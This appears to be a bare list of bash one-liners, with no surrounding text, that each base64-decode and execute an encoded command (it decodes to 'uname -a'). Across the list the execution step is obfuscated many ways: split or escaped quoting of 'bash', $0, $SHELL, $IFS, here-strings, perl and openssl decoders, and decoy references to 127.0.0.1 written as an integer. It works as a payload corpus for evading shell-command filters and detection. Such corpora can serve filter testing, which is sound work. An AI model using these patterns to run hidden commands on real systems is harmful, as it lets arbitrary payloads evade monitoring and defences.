bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba\\sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | /bin/\"bash\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | (bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \"b\"\"ash\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $0"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' |` which bash`"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $(echo bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\$(echo bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $SHELL"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\"a\"sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash --noprofile"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' |/bin/bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash$IFS"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \"ba\"sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\b\\ash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | 'bash'"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $(printf b%sa%ss%sh)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b\\a\\s\\h"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \$(echo -n bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \\$0"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \${SHELL##*/}"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ba\"sh\""
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | \$(cat <<< bash)"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | b'ash'"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | /bin/ba''sh"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $0 #bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | e\"val\" bash"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | $(basename $(which bash))"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | ${SHELL//\//\/}"
bash -c "printf %s dW5hbWUgLWE= | base64 -d | bash"
bash -c "perl -MMIME::Base64 -e 'print decode_base64 q(dW5hbWUgLWE=)' | bash"
bash -c "echo -n 'dW5hbWUgLWE=' | base64 -d | bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 --decode | bash"
bash -c "echo 'dW5hbWUgLWE=' | openssl enc -base64 -d | bash"
bash -c "echo 'dW5hbWUgLWE=' | python3 -m base64 -d | bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | sh"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | /bin/sh"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | /usr/bin/sh"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | $(command -v bash)"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | nohup bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 --decode | /bin/bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | $(which bash)"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | command bash"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | bash -i"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | bash -l"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | bash --noprofile"
bash -c "echo 'dW5hbWUgLWE=' | base64 -d | bash --norc --noprofile"
bash -c "base64 -d <<< dW5hbWUgLWE= | bash"
bash -c "perl -MMIME::Base64 -e 'print decode_base64 q(dW5hbWUgLWE=)' | sh"
bash -c "echo dW5hbWUgLWE= | base64 -d | bash"
bash -c "echo dW5hbWUgLWE= | base64 -d | sh"
bash -c "printf 'dW5hbWUgLWE=' | base64 -d | /bin/bash"
bash -c "printf 'dW5hbWUgLWE=' | base64 -d | exec bash"
bash -c "base64 -d <<<"dW5hbWUgLWE=" | exec bash"
bash -c "echo 'dW5hbWUgLWE=' | openssl base64 -d | bash"
bash -c "echo 'dW5hbWUgLWE=' | openssl enc -d -base64 | bash"
bash -c "base64 --decode <<< 'dW5hbWUgLWE=' | bash"
bash -c "cat <(echo 'dW5hbWUgLWE=') | base64 -d | bash"
bash -c "cat <(echo dW5hbWUgLWE=) | base64 -d | bash"
bash -c "$(echo dW5hbWUgLWE= | base64 -d)"
bash -c "`echo dW5hbWUgLWE= | base64 -d`"
bash -c "$(cat <<< 'dW5hbWUgLWE=' | base64 -d)"
bash -c "$(echo 'dW5hbWUgLWE=' | base64 --decode)"
bash -c "`perl -MMIME::Base64 -e 'print decode_base64(\"dW5hbWUgLWE=\")'`"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' |sh"
bash -c "echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)'|sh"
bash -c "echo 'dW5hbWUgLWE='| perl -MMIME::Base64 -ne 'print decode_base64(\$_)'| bash"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE='" | bash
bash -c "echo dW5hbWUgLWE=|base64 -d|bash"
bash -c "echo dW5hbWUgLWE=|base64 -d|sh"
bash -c "base64 -d <<< dW5hbWUgLWE= | bash"
bash -c "base64 -d<<<dW5hbWUgLWE=|bash"
bash -c "echo dW5hbWUgLWE= | base64 -d | sh"
bash -c "echo dW5hbWUgLWE=| base64 -d |bash"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'"<<<'dW5hbWUgLWE='|bash
bash -c "echo dW5hbWUgLWE=|base64 -d|bash"
bash -c "echo dW5hbWUgLWE= | base64 -d|sh"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='"|sh
bash -c "echo dW5hbWUgLWE=|base64 -d|sh"
bash -c "base64 -d<<<dW5hbWUgLWE="|bash
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='"|sh
bash -c "echo dW5hbWUgLWE= |perl -MMIME::Base64 -ne 'print decode_base64(\$_)' |sh"
bash -c "echo dW5hbWUgLWE=|perl -MMIME::Base64 -ne 'print decode_base64(\$_)'|sh"
bash -c "perl -MMIME::Base64 -ne'print decode_base64(\$_)'"<<<'dW5hbWUgLWE='|bash
bash -c "echo dW5hbWUgLWE=| base64 -d|sh"
bash -c "echo dW5hbWUgLWE=| base64 -d |sh"
bash -c "echo dW5hbWUgLWE= |base64 -d|sh"
bash -c "echo dW5hbWUgLWE=| base64 -d | bash"
bash -c "perl -MMIME::Base64 -ne'print decode_base64(\$_)'"<<<'dW5hbWUgLWE='|sh
bash -c "echo dW5hbWUgLWE= | base64 -d |sh"
bash -c "base64 -d<<<'dW5hbWUgLWE='"|bash
bash -c "base64 -d<<<dW5hbWUgLWE="|sh
bash -c "echo dW5hbWUgLWE=|base64 -d | sh"
bash -c "echo dW5hbWUgLWE=|base64 -d| /bin/sh"
bash -c "echo dW5hbWUgLWE=| base64 -d| /bin/bash"
bash -c "echo dW5hbWUgLWE=|base64 -d|/bin/bash"
bash -c "base64 -d<<<dW5hbWUgLWE=|/bin/sh"
bash -c "bash < <(echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< \"dW5hbWUgLWE=\" | bash"
bash -c "echo dW5hbWUgLWE= | bash < <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "bash <<< \$(echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' < <(echo 'dW5hbWUgLWE=') | bash"
bash -c "bash <(echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "bash <<< \$(perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< dW5hbWUgLWE= | bash"
bash -c "bash < <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=')"
bash -c "echo 'dW5hbWUgLWE=' | bash < <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "bash <<< \$(perl -MMIME::Base64 -ne 'print decode_base64(\$_)' < <(echo 'dW5hbWUgLWE='))"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <(echo 'dW5hbWUgLWE=') | bash"
bash -c "bash <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)' < <(echo 'dW5hbWUgLWE='))"
bash -c "bash<<<\$(echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<dW5hbWUgLWE=|bash"
bash -c "bash< <(echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "bash <(echo 'dW5hbWUgLWE='|perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' < <(echo dW5hbWUgLWE=) | bash"
bash -c "bash<<<\$(perl -MMIME::Base64 -ne 'print decode_base64(\$_)'< <(echo dW5hbWUgLWE=))"
bash -c "bash < <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)'< <(echo dW5hbWUgLWE=))"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE='|bash"
bash -c "bash<<<\$(echo dW5hbWUgLWE=|perl -MMIME::Base64 -ne 'print decode_base64(\$_)')"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)'< <(echo 'dW5hbWUgLWE=')|bash"
bash -c "bash <(perl -MMIME::Base64 -ne 'print decode_base64(\$_)'<<<'dW5hbWUgLWE=')"
bash -c "echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash #2130706433"
bash -c "perl -MMIME::Base64 -e 'print decode_base64(\"dW5hbWUgLWE=\")' | bash #address=2130706433"
bash -c "ping -c1 2130706433 && echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash"
bash -c "echo 'address=2130706433' > /dev/null; echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash"
bash -c "printf 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash #2130706433"
bash -c "base64 -d <<< 'dW5hbWUgLWE=' | bash #address=2130706433"
bash -c "perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=' | bash #recoded IP"
bash -c "ip a | grep 2130706433; echo 'dW5hbWUgLWE=' | perl -MMIME::Base64 -ne 'print decode_base64(\$_)' | bash"
bash -c "dig -x 2130706433 && perl -MMIME::Base64 -ne 'print decode_base64(\$_)' <<< 'dW5hbWUgLWE=' | bash"
bash -c "PERL5OPT=-MMIME::Base64 perl -e 'print decode_base64(\"dW5hbWUgLWE=\")' | bash"
bash -c "perl -e 'print scalar reverse(\"dW5hbWUgLWE=\")' | rev | base64 -d | bash"
bash -c "perl -MMIME::Base64 -e 'print decode_base64(\"dW5hbWUgLWE=\")' | bash #@2130706433"
bash -c "echo 'dW5hbWUgLWE=' > /tmp/.x && perl -MMIME::Base64 -ne 'print decode_base64(\$_)' /tmp/.x | bash"
bash -c "printf 'dW5hbWUgLWE=' | base64 -d | bash #ip-int"
bash -c "dig +short -x 2130706433 && base64 -d <<< dW5hbWUgLWE= | bash"
bash -c "set -- 2130706433 && echo \$1 | xargs -I{} echo {} | perl -MMIME::Base64 -ne 'print decode_base64(\"dW5hbWUgLWE=\")' | bash"
bash -c "base64 -d <<<'dW5hbWUgLWE=' | bash #recoded-IP"
bash -c "HOST=2130706433 && ping -c1 \$HOST && echo 'dW5hbWUgLWE=' | base64 -d | bash"
